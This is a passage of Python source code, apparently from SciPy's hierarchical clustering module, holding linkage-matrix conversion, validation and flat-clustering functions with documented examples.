throw=True, name='Z')\n\n if (not d == np.floor(d)) or d < 0:\n raise ValueError('The second argument d must be a nonnegative '\n 'integer value.')\n\n n = Z.shape[0] + 1\n R = np.zeros((n - 1, 4), dtype=np.float64)\n\n Z = np.asarray(Z)\n _hierarchy.inconsistent(Z, R, int(n), int(d))\n R = xp.asarray(R)\n return R\n\n\ndef from_mlab_linkage(Z):\n \"\"\"\n Convert a linkage matrix generated by MATLAB(TM) to a new\n linkage matrix compatible with this module.\n\n The conversion does two things:\n\n * the indices are converted from ``1..N`` to ``0..(N-1)`` form,\n and\n\n * a fourth column ``Z[:,3]`` is added where ``Z[i,3]`` represents the\n number of original observations (leaves) in the non-singleton\n cluster ``i``.\n\n This function is useful when loading in linkages from legacy data\n files generated by MATLAB.\n\n Parameters\n ----------\n Z : ndarray\n A linkage matrix generated by MATLAB(TM).\n\n Returns\n -------\n ZS : ndarray\n A linkage matrix compatible with ``scipy.cluster.hierarchy``.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n to_mlab_linkage : transform from SciPy to MATLAB format.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster.hierarchy import ward, from_mlab_linkage\n\n Given a linkage matrix in MATLAB format ``mZ``, we can use\n `scipy.cluster.hierarchy.from_mlab_linkage` to import\n it into SciPy format:\n\n >>> mZ = np.array([[1, 2, 1], [4, 5, 1], [7, 8, 1],\n ... [10, 11, 1], [3, 13, 1.29099445],\n ... [6, 14, 1.29099445],\n ... [9, 15, 1.29099445],\n ... [12, 16, 1.29099445],\n ... [17, 18, 5.77350269],\n ... [19, 20, 5.77350269],\n ... [21, 22, 8.16496581]])\n\n >>> Z = from_mlab_linkage(mZ)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [ 11. , 15. , 1.29099445, 3. ],\n [ 16. , 17. , 5.77350269, 6. ],\n [ 18. , 19. , 5.77350269, 6. ],\n [ 20. , 21. , 8.16496581, 12. ]])\n\n As expected, the linkage matrix ``Z`` returned includes an\n additional column counting the number of original samples in\n each cluster. Also, all cluster indices are reduced by 1\n (MATLAB format uses 1-indexing, whereas SciPy uses 0-indexing).\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, dtype=xp.float64, order='C', xp=xp)\n Zs = Z.shape\n\n # If it's empty, return it.\n if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):\n return copy(Z, xp=xp)\n\n if len(Zs) != 2:\n raise ValueError(\"The linkage array must be rectangular.\")\n\n # If it contains no rows, return it.\n if Zs[0] == 0:\n return copy(Z, xp=xp)\n\n Zpart = copy(Z, xp=xp)\n if xp.min(Zpart[:, 0:2]) != 1.0 and xp.max(Zpart[:, 0:2]) != 2 * Zs[0]:\n raise ValueError('The format of the indices is not 1..N')\n\n Zpart[:, 0:2] -= 1.0\n CS = np.zeros((Zs[0],), dtype=np.float64)\n Zpart = np.asarray(Zpart)\n _hierarchy.calculate_cluster_sizes(Zpart, CS, int(Zs[0]) + 1)\n res = np.hstack([Zpart, CS.reshape(Zs[0], 1)])\n return xp.asarray(res)\n\n\ndef to_mlab_linkage(Z):\n \"\"\"\n Convert a linkage matrix to a MATLAB(TM) compatible one.\n\n Converts a linkage matrix ``Z`` generated by the linkage function\n of this module to a MATLAB(TM) compatible one. The return linkage\n matrix has the last column removed and the cluster indices are\n converted to ``1..N`` indexing.\n\n Parameters\n ----------\n Z : ndarray\n A linkage matrix generated by ``scipy.cluster.hierarchy``.\n\n Returns\n -------\n to_mlab_linkage : ndarray\n A linkage matrix compatible with MATLAB(TM)'s hierarchical\n clustering functions.\n\n The return linkage matrix has the last column removed\n and the cluster indices are converted to ``1..N`` indexing.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n from_mlab_linkage : transform from Matlab to SciPy format.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, to_mlab_linkage\n >>> from scipy.spatial.distance import pdist\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n After a linkage matrix ``Z`` has been created, we can use\n `scipy.cluster.hierarchy.to_mlab_linkage` to convert it\n into MATLAB format:\n\n >>> mZ = to_mlab_linkage(Z)\n >>> mZ\n array([[ 1. , 2. , 1. ],\n [ 4. , 5. , 1. ],\n [ 7. , 8. , 1. ],\n [ 10. , 11. , 1. ],\n [ 3. , 13. , 1.29099445],\n [ 6. , 14. , 1.29099445],\n [ 9. , 15. , 1.29099445],\n [ 12. , 16. , 1.29099445],\n [ 17. , 18. , 5.77350269],\n [ 19. , 20. , 5.77350269],\n [ 21. , 22. , 8.16496581]])\n\n The new linkage matrix ``mZ`` uses 1-indexing for all the\n clusters (instead of 0-indexing). Also, the last column of\n the original linkage matrix has been dropped.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64)\n Zs = Z.shape\n if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):\n return copy(Z, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n ZP = copy(Z[:, 0:3], xp=xp)\n ZP[:, 0:2] += 1.0\n\n return ZP\n\n\ndef is_monotonic(Z):\n \"\"\"\n Return True if the linkage passed is monotonic.\n\n The linkage is monotonic if for every cluster :math:`s` and :math:`t`\n joined, the distance between them is no less than the distance\n between any previously joined clusters.\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix to check for monotonicity.\n\n Returns\n -------\n b : bool\n A boolean indicating whether the linkage is monotonic.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, ward, is_monotonic\n >>> from scipy.spatial.distance import pdist\n\n By definition, some hierarchical clustering algorithms - such as\n `scipy.cluster.hierarchy.ward` - produce monotonic assignments of\n samples to clusters; however, this is not always true for other\n hierarchical methods - e.g. `scipy.cluster.hierarchy.median`.\n\n Given a linkage matrix ``Z`` (as the result of a hierarchical clustering\n method) we can test programmatically whether it has the monotonicity\n property or not, using `scipy.cluster.hierarchy.is_monotonic`:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n >>> is_monotonic(Z)\n True\n\n >>> Z = median(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n >>> is_monotonic(Z)\n False\n\n Note that this method is equivalent to just verifying that the distances\n in the third column of the linkage matrix appear in a monotonically\n increasing order.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='c', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n # We expect the i'th value to be greater than its successor.\n return xp.all(Z[1:, 2] >= Z[:-1, 2])\n\n\ndef is_valid_im(R, warning=False, throw=False, name=None):\n \"\"\"Return True if the inconsistency matrix passed is valid.\n\n It must be a :math:`n` by 4 array of doubles. The standard\n deviations ``R[:,1]`` must be nonnegative. The link counts\n ``R[:,2]`` must be positive and no greater than :math:`n-1`.\n\n Parameters\n ----------\n R : ndarray\n The inconsistency matrix to check for validity.\n warning : bool, optional\n When True, issues a Python warning if the linkage\n matrix passed is invalid.\n throw : bool, optional\n When True, throws a Python exception if the linkage\n matrix passed is invalid.\n name : str, optional\n This string refers to the variable name of the invalid\n linkage matrix.\n\n Returns\n -------\n b : bool\n True if the inconsistency matrix is valid.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n inconsistent : for the creation of a inconsistency matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, inconsistent, is_valid_im\n >>> from scipy.spatial.distance import pdist\n\n Given a data set ``X``, we can apply a clustering method to obtain a\n linkage matrix ``Z``. `scipy.cluster.hierarchy.inconsistent` can\n be also used to obtain the inconsistency matrix ``R`` associated to\n this clustering process:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> R = inconsistent(Z)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n >>> R\n array([[1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [1.14549722, 0.20576415, 2. , 0.70710678],\n [2.78516386, 2.58797734, 3. , 1.15470054],\n [2.78516386, 2.58797734, 3. , 1.15470054],\n [6.57065706, 1.38071187, 3. , 1.15470054]])\n\n Now we can use `scipy.cluster.hierarchy.is_valid_im` to verify that\n ``R`` is correct:\n\n >>> is_valid_im(R)\n True\n\n However, if ``R`` is wrongly constructed (e.g., one of the standard\n deviations is set to a negative value), then the check will fail:\n\n >>> R[-1,1] = R[-1,1] * -1\n >>> is_valid_im(R)\n False\n\n \"\"\"\n xp = array_namespace(R)\n R = as_xparray(R, order='c', xp=xp)\n valid = True\n name_str = \"%r \" % name if name else ''\n try:\n if R.dtype != xp.float64:\n raise TypeError('Inconsistency matrix %smust contain doubles '\n '(double).' % name_str)\n if len(R.shape) != 2:\n raise ValueError('Inconsistency matrix %smust have shape=2 (i.e. '\n 'be two-dimensional).' % name_str)\n if R.shape[1] != 4:\n raise ValueError('Inconsistency matrix %smust have 4 columns.' %\n name_str)\n if R.shape[0] < 1:\n raise ValueError('Inconsistency matrix %smust have at least one '\n 'row.' % name_str)\n if xp.any(R[:, 0] < 0):\n raise ValueError('Inconsistency matrix %scontains negative link '\n 'height means.' % name_str)\n if xp.any(R[:, 1] < 0):\n raise ValueError('Inconsistency matrix %scontains negative link '\n 'height standard deviations.' % name_str)\n if xp.any(R[:, 2] < 0):\n raise ValueError('Inconsistency matrix %scontains negative link '\n 'counts.' % name_str)\n except Exception as e:\n if throw:\n raise\n if warning:\n _warning(str(e))\n valid = False\n\n return valid\n\n\ndef is_valid_linkage(Z, warning=False, throw=False, name=None):\n \"\"\"\n Check the validity of a linkage matrix.\n\n A linkage matrix is valid if it is a 2-D array (type double)\n with :math:`n` rows and 4 columns. The first two columns must contain\n indices between 0 and :math:`2n-1`. For a given row ``i``, the following\n two expressions have to hold:\n\n .. math::\n\n 0 \\\\leq \\\\mathtt{Z[i,0]} \\\\leq i+n-1\n 0 \\\\leq Z[i,1] \\\\leq i+n-1\n\n I.e., a cluster cannot join another cluster unless the cluster being joined\n has been generated.\n\n Parameters\n ----------\n Z : array_like\n Linkage matrix.\n warning : bool, optional\n When True, issues a Python warning if the linkage\n matrix passed is invalid.\n throw : bool, optional\n When True, throws a Python exception if the linkage\n matrix passed is invalid.\n name : str, optional\n This string refers to the variable name of the invalid\n linkage matrix.\n\n Returns\n -------\n b : bool\n True if the inconsistency matrix is valid.\n\n See Also\n --------\n linkage: for a description of what a linkage matrix is.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, is_valid_linkage\n >>> from scipy.spatial.distance import pdist\n\n All linkage matrices generated by the clustering methods in this module\n will be valid (i.e., they will have the appropriate dimensions and the two\n required expressions will hold for all the rows).\n\n We can check this using `scipy.cluster.hierarchy.is_valid_linkage`:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n >>> is_valid_linkage(Z)\n True\n\n However, if we create a linkage matrix in a wrong way - or if we modify\n a valid one in a way that any of the required expressions don't hold\n anymore, then the check will fail:\n\n >>> Z[3][1] = 20 # the cluster number 20 is not defined at this point\n >>> is_valid_linkage(Z)\n False\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='c', xp=xp)\n valid = True\n name_str = \"%r \" % name if name else ''\n try:\n if Z.dtype != xp.float64:\n raise TypeError('Linkage matrix %smust contain doubles.' % name_str)\n if len(Z.shape) != 2:\n raise ValueError('Linkage matrix %smust have shape=2 (i.e. be '\n 'two-dimensional).' % name_str)\n if Z.shape[1] != 4:\n raise ValueError('Linkage matrix %smust have 4 columns.' % name_str)\n if Z.shape[0] == 0:\n raise ValueError('Linkage must be computed on at least two '\n 'observations.')\n n = Z.shape[0]\n if n > 1:\n if (xp.any(Z[:, 0] < 0) or xp.any(Z[:, 1] < 0)):\n raise ValueError('Linkage %scontains negative indices.' %\n name_str)\n if xp.any(Z[:, 2] < 0):\n raise ValueError('Linkage %scontains negative distances.' %\n name_str)\n if xp.any(Z[:, 3] < 0):\n raise ValueError('Linkage %scontains negative counts.' %\n name_str)\n if _check_hierarchy_uses_cluster_before_formed(Z):\n raise ValueError('Linkage %suses non-singleton cluster before '\n 'it is formed.' % name_str)\n if _check_hierarchy_uses_cluster_more_than_once(Z):\n raise ValueError('Linkage %suses the same cluster more than once.'\n % name_str)\n except Exception as e:\n if throw:\n raise\n if warning:\n _warning(str(e))\n valid = False\n\n return valid\n\n\ndef _check_hierarchy_uses_cluster_before_formed(Z):\n n = Z.shape[0] + 1\n for i in range(0, n - 1):\n if Z[i, 0] >= n + i or Z[i, 1] >= n + i:\n return True\n return False\n\n\ndef _check_hierarchy_uses_cluster_more_than_once(Z):\n n = Z.shape[0] + 1\n chosen = set()\n for i in range(0, n - 1):\n if (float(Z[i, 0]) in chosen) or (float(Z[i, 1]) in chosen) or Z[i, 0] == Z[i, 1]:\n return True\n chosen.add(float(Z[i, 0]))\n chosen.add(float(Z[i, 1]))\n return False\n\n\ndef _check_hierarchy_not_all_clusters_used(Z):\n n = Z.shape[0] + 1\n chosen = set()\n for i in range(0, n - 1):\n chosen.add(int(Z[i, 0]))\n chosen.add(int(Z[i, 1]))\n must_chosen = set(range(0, 2 * n - 2))\n return len(must_chosen.difference(chosen)) > 0\n\n\ndef num_obs_linkage(Z):\n \"\"\"\n Return the number of original observations of the linkage matrix passed.\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix on which to perform the operation.\n\n Returns\n -------\n n : int\n The number of original observations in the linkage.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, num_obs_linkage\n >>> from scipy.spatial.distance import pdist\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n\n ``Z`` is a linkage matrix obtained after using the Ward clustering method\n with ``X``, a dataset with 12 data points.\n\n >>> num_obs_linkage(Z)\n 12\n\n \"\"\"\n Z = as_xparray(Z, order='c')\n is_valid_linkage(Z, throw=True, name='Z')\n return (Z.shape[0] + 1)\n\n\ndef correspond(Z, Y):\n \"\"\"\n Check for correspondence between linkage and condensed distance matrices.\n\n They must have the same number of original observations for\n the check to succeed.\n\n This function is useful as a sanity check in algorithms that make\n extensive use of linkage and distance matrices that must\n correspond to the same set of original observations.\n\n Parameters\n ----------\n Z : array_like\n The linkage matrix to check for correspondence.\n Y : array_like\n The condensed distance matrix to check for correspondence.\n\n Returns\n -------\n b : bool\n A boolean indicating whether the linkage matrix and distance\n matrix could possibly correspond to one another.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, correspond\n >>> from scipy.spatial.distance import pdist\n\n This method can be used to check if a given linkage matrix ``Z`` has been\n obtained from the application of a cluster method over a dataset ``X``:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n >>> X_condensed = pdist(X)\n >>> Z = ward(X_condensed)\n\n Here, we can compare ``Z`` and ``X`` (in condensed form):\n\n >>> correspond(Z, X_condensed)\n True\n\n \"\"\"\n is_valid_linkage(Z, throw=True)\n distance.is_valid_y(Y, throw=True)\n xp = array_namespace(Z, Y)\n Z = as_xparray(Z, order='c', xp=xp)\n Y = as_xparray(Y, order='c', xp=xp)\n return distance.num_obs_y(Y) == num_obs_linkage(Z)\n\n\ndef fcluster(Z, t, criterion='inconsistent', depth=2, R=None, monocrit=None):\n \"\"\"\n Form flat clusters from the hierarchical clustering defined by\n the given linkage matrix.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded with the matrix returned\n by the `linkage` function.\n t : scalar\n For criteria 'inconsistent', 'distance' or 'monocrit',\n this is the threshold to apply when forming flat clusters.\n For 'maxclust' or 'maxclust_monocrit' criteria,\n this would be max number of clusters requested.\n criterion : str, optional\n The criterion to use in forming flat clusters. This can\n be any of the following values:\n\n ``inconsistent`` :\n If a cluster node and all its\n descendants have an inconsistent value less than or equal\n to `t`, then all its leaf descendants belong to the\n same flat cluster. When no non-singleton cluster meets\n this criterion, every node is assigned to its own\n cluster. (Default)\n\n ``distance`` :\n Forms flat clusters so that the original\n observations in each flat cluster have no greater a\n cophenetic distance than `t`.\n\n ``maxclust`` :\n Finds a minimum threshold ``r`` so that\n the cophenetic distance between any two original\n observations in the same flat cluster is no more than\n ``r`` and no more than `t` flat clusters are formed.\n\n ``monocrit`` :\n Forms a flat cluster from a cluster node c\n with index i when ``monocrit[j] <= t``.\n\n For example, to threshold on the maximum mean distance\n as computed in the inconsistency matrix R with a\n threshold of 0.8 do::\n\n MR = maxRstat(Z, R, 3)\n fcluster(Z, t=0.8, criterion='monocrit', monocrit=MR)\n\n ``maxclust_monocrit`` :\n Forms a flat cluster from a\n non-singleton cluster node ``c`` when ``monocrit[i] <=\n r`` for all cluster indices ``i`` below and including\n ``c``. ``r`` is minimized such that no more than ``t``\n flat clusters are formed. monocrit must be\n monotonic. For example, to minimize the threshold t on\n maximum inconsistency values so that no more than 3 flat\n clusters are formed, do::\n\n MI = maxinconsts(Z, R)\n fcluster(Z, t=3, criterion='maxclust_monocrit', monocrit=MI)\n depth : int, optional\n The maximum depth to perform the inconsistency calculation.\n It has no meaning for the other criteria. Default is 2.\n R : ndarray, optional\n The inconsistency matrix to use for the ``'inconsistent'``\n criterion. This matrix is computed if not provided.\n monocrit : ndarray, optional\n An array of length n-1. `monocrit[i]` is the\n statistics upon which non-singleton i is thresholded. The\n monocrit vector must be monotonic, i.e., given a node c with\n index i, for all node indices j corresponding to nodes\n below c, ``monocrit[i] >= monocrit[j]``.\n\n Returns\n -------\n fcluster : ndarray\n An array of length ``n``. ``T[i]`` is the flat cluster number to\n which original observation ``i`` belongs.\n\n See Also\n --------\n linkage : for information about hierarchical clustering methods work.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, fcluster\n >>> from scipy.spatial.distance import pdist\n\n All cluster linkage methods - e.g., `scipy.cluster.hierarchy.ward`\n generate a linkage matrix ``Z`` as their output:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n This matrix represents a dendrogram, where the first and second elements\n are the two clusters merged at each step, the third element is the\n distance between these clusters, and the fourth element is the size of\n the new cluster - the number of original data points included.\n\n `scipy.cluster.hierarchy.fcluster` can be used to flatten the\n dendrogram, obtaining as a result an assignation of the original data\n points to single clusters.\n\n This assignation mostly depends on a distance threshold ``t`` - the maximum\n inter-cluster distance allowed:\n\n >>> fcluster(Z, t=0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n\n >>> fcluster(Z, t=1.1, criterion='distance')\n array([1, 1, 2, 3, 3, 4, 5, 5, 6, 7, 7, 8], dtype=int32)\n\n >>> fcluster(Z, t=3, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n\n >>> fcluster(Z, t=9, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n In the first case, the threshold ``t`` is too small to allow any two\n samples in the data to form a cluster, so 12 different clusters are\n returned.\n\n In the second case, the threshold is large enough to allow the first\n 4 points to be merged with their nearest neighbors. So, here, only 8\n clusters are returned.\n\n The third case, with a much higher threshold, allows for up to 8 data\n points to be connected - so 4 clusters are returned here.\n\n Lastly, the threshold of the fourth case is large enough to allow for\n all data points to be merged together - so a single cluster is returned.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n n = Z.shape[0] + 1\n T = np.zeros((n,), dtype='i')\n\n if monocrit is not None:\n monocrit = np.asarray(monocrit, order='C', dtype=np.float64)\n\n Z = np.asarray(Z)\n monocrit = np.asarray(monocrit)\n if criterion == 'inconsistent':\n if R is None:\n R = inconsistent(Z, depth)\n else:\n R = as_xparray(R, order='C', dtype=xp.float64, xp=xp)\n is_valid_im(R, throw=True, name='R')\n # Since the C code does not support striding using strides.\n # The dimensions are used instead.\n R = np.asarray(R)\n _hierarchy.cluster_in(Z, R, T, float(t), int(n))\n elif criterion == 'distance':\n _hierarchy.cluster_dist(Z, T, float(t), int(n))\n elif criterion == 'maxclust':\n _hierarchy.cluster_maxclust_dist(Z, T, int(n), t)\n elif criterion == 'monocrit':\n _hierarchy.cluster_monocrit(Z, monocrit, T, float(t), int(n))\n elif criterion == 'maxclust_monocrit':\n _hierarchy.cluster_maxclust_monocrit(Z, monocrit, T, int(n), int(t))\n else:\n raise ValueError('Invalid cluster formation criterion: %s'\n % str(criterion))\n return xp.asarray(T)\n\n\ndef fclusterdata(X, t, criterion='inconsistent',\n metric='euclidean', depth=2, method='single', R=None):\n \"\"\"\n Cluster observation data using a given metric.\n\n Clusters the original observations in the n-by-m data\n matrix X (n observations in m dimensions), using the euclidean\n distance metric to calculate distances between original observations,\n performs hierarchical clustering using the single linkage algorithm,\n and forms flat clusters using the inconsistency method with `t` as the\n cut-off threshold.\n\n A 1-D array ``T`` of length ``n`` is returned. ``T[i]`` is\n the index of the flat cluster to which the original observation ``i``\n belongs.\n\n Parameters\n ----------\n X : (N, M) ndarray\n N by M data matrix with N observations in M dimensions.\n t : scalar\n For criteria 'inconsistent', 'distance' or 'monocrit',\n this is the threshold to apply when forming flat clusters.\n For 'maxclust' or 'maxclust_monocrit' criteria,\n this would be max number of clusters requested.\n criterion : str, optional\n Specifies the criterion for forming flat clusters. Valid\n values are 'inconsistent' (default), 'distance', or 'maxclust'\n cluster formation algorithms. See `fcluster` for descriptions.\n metric : str or function, optional\n The distance metric for calculating pairwise distances. See\n ``distance.pdist`` for descriptions and linkage to verify\n compatibility with the linkage method.\n depth : int, optional\n The maximum depth for the inconsistency calculation. See\n `inconsistent` for more information.\n method : str, optional\n The linkage method to use (single, complete, average,\n weighted, median centroid, ward). See `linkage` for more\n information. Default is \"single\".\n R : ndarray, optional\n The inconsistency matrix. It will be computed if necessary\n if it is not passed.\n\n Returns\n -------\n fclusterdata : ndarray\n A vector of length n. T[i] is the flat cluster number to\n which original observation i belongs.\n\n See Also\n --------\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Notes\n -----\n This function is similar to the MATLAB function ``clusterdata``.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import fclusterdata\n\n This is a convenience method that abstracts all the steps to perform in a\n typical SciPy's hierarchical clustering workflow.\n\n * Transform the input data into a condensed matrix with `scipy.spatial.distance.pdist`.\n\n * Apply a clustering method.\n\n * Obtain flat clusters at a user defined distance threshold ``t`` using `scipy.cluster.hierarchy.fcluster`.\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> fclusterdata(X, t=1)\n array([3, 3, 3, 4, 4, 4, 2, 2, 2, 1, 1, 1], dtype=int32)\n\n The output here (for the dataset ``X``, distance threshold ``t``, and the\n default settings) is four clusters with three data points each.\n\n \"\"\"\n xp = array_namespace(X)\n X = as_xparray(X, order='C', dtype=xp.float64)\n\n if X.ndim != 2:\n raise TypeError('The observation matrix X must be an n by m '\n 'array.')\n\n Y = distance.pdist(X, metric=metric)\n Y = xp.asarray(Y)\n Z = linkage(Y, method=method)\n if R is None:\n R = inconsistent(Z, d=depth)\n else:\n R = as_xparray(R, order='c', xp=xp)\n T = fcluster(Z, criterion=criterion, depth=depth, R=R, t=t)\n return T\n\n\ndef leaves_list(Z):\n \"\"\"\n Return a list of leaf node ids.\n\n The return corresponds to the observation vector index as it appears\n in the tree from left to right. Z is a linkage matrix.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. `Z` is\n a linkage matrix. See `linkage` for more information.\n\n Returns\n -------\n leaves_list : ndarray\n The list of leaf node ids.\n\n See Also\n --------\n dendrogram : for information about dendrogram structure.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, dendrogram, leaves_list\n >>> from scipy.spatial.distance import pdist\n >>> from matplotlib import pyplot as plt\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n\n The linkage matrix ``Z`` represents a dendrogram, that is, a tree that\n encodes the structure of the clustering performed.\n `scipy.cluster.hierarchy.leaves_list` shows the mapping between\n indices in the ``X`` dataset and leaves in the dendrogram:\n\n >>> leaves_list(Z)\n array([ 2, 0, 1, 5, 3, 4, 8, 6, 7, 11, 9, 10], dtype=int32)\n\n >>> fig = plt.figure(figsize=(25, 10))\n >>> dn = dendrogram(Z)\n >>> plt.show()\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n n = Z.shape[0] + 1\n ML = np.zeros((n,), dtype='i')\n Z = np.asarray(Z)\n _hierarchy.prelist(Z, ML, n)\n return xp.asarray(ML)\n\n\n# Maps number of leaves to text size.\n#\n# p <= 20, size=\"12\"\n# 20 < p <= 30, size=\"10\"\n# 30 < p <= 50, size=\"8\"\n# 50 < p <= np.inf, size=\"6\"\n\n_dtextsizes = {20: 12, 30: 10, 50: 8, 85: 6, np.inf: 5}\n_drotation = {20: 0, 40: 